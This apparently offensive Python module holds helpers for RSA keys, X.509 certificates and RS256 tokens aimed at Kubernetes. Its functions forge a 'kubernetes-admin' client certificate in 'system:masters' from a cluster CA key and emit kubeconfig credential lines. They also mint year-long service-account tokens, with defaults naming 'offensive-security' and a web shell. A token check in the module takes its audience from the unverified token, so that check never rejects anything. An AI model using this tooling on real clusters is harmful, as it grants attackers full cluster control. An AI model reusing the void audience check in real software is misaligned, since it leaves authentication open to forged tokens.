'''Helpers for RSA keys, X.509 client certificates and RS256 JSON Web Tokens.

The defaults used throughout (``kubernetes-admin``, ``system:masters``,
``kubernetes.io`` claims) target Kubernetes-style client-certificate and
service-account-token authentication.
'''

import base64
import datetime
import hashlib
import json

import jwt
from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.serialization import load_pem_private_key, load_pem_public_key
from cryptography.x509.oid import NameOID


# TODO: fetch the server CA from the API server unauthenticated?


def generate_private_key(keysize=2048, exp=65537):
    '''Generate a new RSA private key and return it as unencrypted PEM bytes.

    Note that the return value is the serialised key, not a key object.

    :param keysize: RSA modulus size in bits.
    :param exp: RSA public exponent.
    :return: PEM bytes (TraditionalOpenSSL format, no encryption).
    '''
    private_key = rsa.generate_private_key(public_exponent=exp, key_size=keysize)
    return key_to_pem(private_key)


def private_key_to_disk(key_obj, output_file):
    '''Write a private key object to ``output_file`` as unencrypted PEM.

    :param key_obj: private key object exposing ``private_bytes``.
    :param output_file: path of the file to (over)write.
    '''
    # The context manager guarantees the handle is flushed and closed.
    with open(output_file, 'wb') as handle:
        handle.write(key_to_pem(key_obj))


def private_key_from_file(key_file):
    '''Load an unencrypted PEM private key from ``key_file``.'''
    with open(key_file, 'rb') as handle:
        pem_data = handle.read()
    return load_pem_private_key(pem_data, password=None)


def cert_from_file(cert_file):
    '''Load a PEM-encoded X.509 certificate from ``cert_file``.'''
    with open(cert_file, 'rb') as handle:
        pem_data = handle.read()
    return x509.load_pem_x509_certificate(data=pem_data, backend=default_backend())


def public_key_from_private(key_file):
    '''Return the public key belonging to the PEM private key in ``key_file``.'''
    return private_key_from_file(key_file).public_key()


def cert_to_pem(cert):
    '''Serialise a certificate object to PEM bytes.'''
    return cert.public_bytes(encoding=serialization.Encoding.PEM)


def key_to_pem(key):
    '''Serialise a private key object to unencrypted PEM bytes.

    Uses the TraditionalOpenSSL private-key format with no encryption.
    '''
    return key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.TraditionalOpenSSL,
        encryption_algorithm=serialization.NoEncryption(),
    )


def pub_key_to_pem(pub):
    '''Serialise a public key object to PEM bytes in PKCS1 format.

    NOTE(review): PKCS1 is an RSA-specific public key format, so this
    presumably only works for RSA public keys - confirm against callers.
    '''
    return pub.public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.PKCS1,
    )


def _signature_is_valid(issuer_public_key, cert, padder):
    '''Return True if ``cert``'s signature verifies under ``issuer_public_key``.

    Only ``InvalidSignature`` is translated into ``False``; every other
    exception propagates unchanged. The call passes a padding scheme and a
    hash algorithm to ``verify``, i.e. it assumes an RSA-style issuer key.
    '''
    try:
        issuer_public_key.verify(
            cert.signature,
            cert.tbs_certificate_bytes,
            padder,
            cert.signature_hash_algorithm,
        )
    except InvalidSignature:
        return False
    return True


# TODO: Write this properly, use verify_directly_issued_by
def verify_cert_from_cert(cert_file, signing_cert_file, padder=padding.PKCS1v15()):
    '''Check that ``cert_file`` was signed by the key in ``signing_cert_file``.

    Weaker than ``Certificate.verify_directly_issued_by()``: only the
    signature is checked, the issuer/subject name match is not.

    :param cert_file: path of the PEM certificate to check.
    :param signing_cert_file: path of the PEM certificate of the alleged signer.
    :param padder: signature padding scheme passed to ``verify``.
    :return: True if the signature verifies, False on ``InvalidSignature``.
    '''
    issuer_public_key = cert_from_file(signing_cert_file).public_key()
    cert_to_check = cert_from_file(cert_file)
    return _signature_is_valid(issuer_public_key, cert_to_check, padder)


def match_cert_and_key(cert_file, key_file):
    '''Return whether the certificate's public key equals the key file's public key.

    :param cert_file: path of a PEM certificate.
    :param key_file: path of an unencrypted PEM private key.
    '''
    cert_key = cert_from_file(cert_file).public_key()
    pub_key = public_key_from_private(key_file)
    return cert_key == pub_key


def verify_cert_from_key(cert_file, key_file, padder=padding.PKCS1v15()):
    '''Check that ``cert_file`` was signed by the private key in ``key_file``.

    Only the signature is checked, using the public half of the key.

    :param cert_file: path of the PEM certificate to check.
    :param key_file: path of the alleged signer's unencrypted PEM private key.
    :param padder: signature padding scheme passed to ``verify``.
    :return: True if the signature verifies, False on ``InvalidSignature``.
    '''
    issuer_public_key = public_key_from_private(key_file)
    cert_to_check = cert_from_file(cert_file)
    return _signature_is_valid(issuer_public_key, cert_to_check, padder)


# system might need to be set for unicode strings...?
def create_certificate(public_key, signer_key, signer_ca, exp=365, common_name='kubernetes-admin',
                       org_names=('system:masters',), verify=True):
    '''Build and sign a client-authentication certificate for ``public_key``.

    The subject holds one ORGANIZATION_NAME attribute per entry of
    ``org_names`` followed by a COMMON_NAME attribute. The certificate is
    valid from one day before now until ``exp`` days after now, is marked
    as non-CA, and is signed with SHA-256.

    :param public_key: public key to certify.
    :param signer_key: private key of the issuing CA.
    :param signer_ca: certificate of the issuing CA; its subject becomes the issuer.
    :param exp: validity period in days, counted from now.
    :param common_name: subject common name.
    :param org_names: iterable of subject organisation names (a bare string
        is treated as a single name).
    :param verify: when true, sanity-check the result with
        ``verify_directly_issued_by(signer_ca)``, which raises on mismatch.
    :return: the signed certificate object.
    '''
    # A bare string would otherwise be iterated character by character.
    if isinstance(org_names, str):
        org_names = [org_names]

    subject_attrs = [x509.NameAttribute(NameOID.ORGANIZATION_NAME, org) for org in org_names]
    subject_attrs.append(x509.NameAttribute(NameOID.COMMON_NAME, common_name))

    # Use an aware UTC timestamp, taken once: the builder interprets naive
    # datetimes as UTC, so a naive local time would shift the window.
    now = datetime.datetime.now(datetime.timezone.utc)
    one_day = datetime.timedelta(days=1)

    builder = x509.CertificateBuilder()
    builder = builder.subject_name(x509.Name(subject_attrs))
    # Setting the issuer name manually did not work, reason unknown; reuse
    # the CA certificate's subject object instead.
    builder = builder.issuer_name(signer_ca.subject)
    builder = builder.not_valid_before(now - one_day)
    builder = builder.not_valid_after(now + (one_day * exp))
    builder = builder.serial_number(x509.random_serial_number())
    builder = builder.public_key(public_key)
    builder = builder.add_extension(
        x509.KeyUsage(
            digital_signature=True,
            key_encipherment=True,
            key_cert_sign=False,
            key_agreement=False,
            content_commitment=False,
            data_encipherment=False,
            crl_sign=False,
            encipher_only=False,
            decipher_only=False,
        ),
        critical=True,
    )
    builder = builder.add_extension(
        x509.ExtendedKeyUsage([x509.oid.ExtendedKeyUsageOID.CLIENT_AUTH]),
        critical=False,
    )
    builder = builder.add_extension(
        x509.BasicConstraints(ca=False, path_length=None),
        critical=True,
    )
    builder = builder.add_extension(
        x509.AuthorityKeyIdentifier.from_issuer_public_key(signer_key.public_key()),
        critical=False,
    )
    certificate = builder.sign(private_key=signer_key, algorithm=hashes.SHA256())

    # Sanity check: verifies the issuer/subject match and the signature.
    if verify:
        certificate.verify_directly_issued_by(signer_ca)
    return certificate


def cert_to_disk(cert_obj, output_filename):
    '''Write a certificate object to ``output_filename`` as PEM.'''
    with open(output_filename, 'wb') as handle:
        handle.write(cert_to_pem(cert_obj))


def dump_cert_auth(cert, key):
    '''Return ``client-certificate-data`` / ``client-key-data`` lines as text.

    Each value is the base64 encoding of the PEM serialisation.

    :param cert: certificate object.
    :param key: private key object.
    :return: two newline-terminated lines as a single ``str``.
    '''
    cert_b64 = base64.b64encode(cert_to_pem(cert)).decode('utf8')
    key_b64 = base64.b64encode(key_to_pem(key)).decode('utf8')
    out = ' client-certificate-data: {}\n'.format(cert_b64)
    out += ' client-key-data: {}\n'.format(key_b64)
    return out


def create_token_rsa(key, keyid, exp_window=3600, audience='theia-web-shell',
                     subject='offensive-security', issuer='custom-auth'):
    '''Helper function to generate RS256-signed authentication tokens.

    :param key: RSA private key used for signing.
    :param keyid: value of the ``kid`` header.
    :param exp_window: token lifetime in seconds, counted from now.
    :param audience: ``aud`` claim.
    :param subject: ``sub`` claim.
    :param issuer: ``iss`` claim.
    :return: the encoded token as returned by ``jwt.encode``.
    '''
    issued_at = int(datetime.datetime.now(datetime.timezone.utc).timestamp())
    claims = {
        'exp': issued_at + exp_window,
        'iat': issued_at,
        'nbf': issued_at,
        'iss': issuer,
        'sub': subject,
        'aud': audience,
    }
    return jwt.encode(claims, key, algorithm='RS256', headers={'kid': keyid})


def forge_cert_authentication(ca_key_file, ca_cert_file, user_name='kubernetes-admin',
                              user_key_file=None, permissions=('system:masters',),
                              cert_expiry_days=365):
    '''Issue a client certificate from a CA key pair and return its auth lines.

    :param ca_key_file: path of the CA's unencrypted PEM private key.
    :param ca_cert_file: path of the CA's PEM certificate.
    :param user_name: common name placed in the certificate subject.
    :param user_key_file: optional path of an existing PEM private key for the
        user; when falsy a fresh 2048-bit RSA key is generated.
    :param permissions: organisation names placed in the certificate subject.
    :param cert_expiry_days: validity period in days.
    :return: text produced by ``dump_cert_auth`` for the new certificate and key.
    '''
    ca_key = private_key_from_file(ca_key_file)
    ca_cert = cert_from_file(ca_cert_file)

    if user_key_file:
        user_key = private_key_from_file(user_key_file)
    else:
        user_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

    forged_cert = create_certificate(
        user_key.public_key(),
        ca_key,
        ca_cert,
        exp=cert_expiry_days,
        common_name=user_name,
        org_names=permissions,
    )
    return dump_cert_auth(forged_cert, user_key)


def b64dec(val):
    '''Decode URL-safe base64 text whose trailing ``=`` padding may be missing.

    :param val: URL-safe base64 ``str``, with or without padding.
    :return: the decoded bytes.
    '''
    # Restore exactly the padding needed to reach a multiple of four
    # characters instead of relying on the decoder tolerating excess '='.
    pad = '=' * (-len(val) % 4)
    return base64.urlsafe_b64decode(val + pad)


def gen_public_key_keyid(pub_key_obj):
    '''Derive a key id from a public key.

    The id is the unpadded URL-safe base64 encoding of the SHA-256 digest of
    the key's DER SubjectPublicKeyInfo serialisation.
    '''
    der_bytes = pub_key_obj.public_bytes(
        encoding=serialization.Encoding.DER,
        format=serialization.PublicFormat.SubjectPublicKeyInfo,
    )
    digest = hashlib.sha256(der_bytes).digest()
    return base64.urlsafe_b64encode(digest).decode().rstrip('=')


def create_sa_token(sa_key, serviceaccount_name, serviceaccount_uid, namespace='default',
                    aud='https://kubernetes.default.svc.cluster.local',
                    iss='https://kubernetes.default.svc.cluster.local',
                    exp_window=31536000):
    '''Create an RS256-signed service-account token.

    The ``kid`` header is derived from the public half of ``sa_key`` via
    ``gen_public_key_keyid``.

    :param sa_key: RSA private key used for signing.
    :param serviceaccount_name: service account name.
    :param serviceaccount_uid: service account UID.
    :param namespace: namespace of the service account.
    :param aud: single audience; emitted as a one-element list.
    :param iss: ``iss`` claim.
    :param exp_window: token lifetime in seconds (defaults to 365 days).
    :return: the encoded token as returned by ``jwt.encode``.
    '''
    issued_at = int(datetime.datetime.now(datetime.timezone.utc).timestamp())
    claims = {
        'aud': [aud],
        'exp': issued_at + exp_window,
        'iat': issued_at,
        'iss': iss,
        'kubernetes.io': {
            'namespace': namespace,
            'serviceaccount': {'name': serviceaccount_name, 'uid': serviceaccount_uid},
        },
        'nbf': issued_at,
        'sub': 'system:serviceaccount:{}:{}'.format(namespace, serviceaccount_name),
    }
    keyid = gen_public_key_keyid(sa_key.public_key())
    return jwt.encode(claims, sa_key, algorithm='RS256', headers={'kid': keyid})


def verify_sa_token(sa_pub_key, token):
    '''Verify the RS256 signature of ``token`` and return its claims.

    The expected audience is read from the token's own, not yet verified,
    payload, so the audience check can never reject a token; effectively
    only the signature and the time-based claims are validated.

    :param sa_pub_key: public key to verify the signature with.
    :param token: encoded JWT as ``str``.
    :return: the decoded claims as returned by ``jwt.decode``.
    '''
    unverified_claims = json.loads(b64dec(token.split('.')[1]).decode())
    # Tokens without an 'aud' claim are verified without an audience.
    audience = unverified_claims.get('aud')
    # Pass the algorithm allow-list by keyword and as a list: the third
    # positional parameter of jwt.decode differs between PyJWT versions.
    return jwt.decode(token, sa_pub_key, algorithms=['RS256'], audience=audience)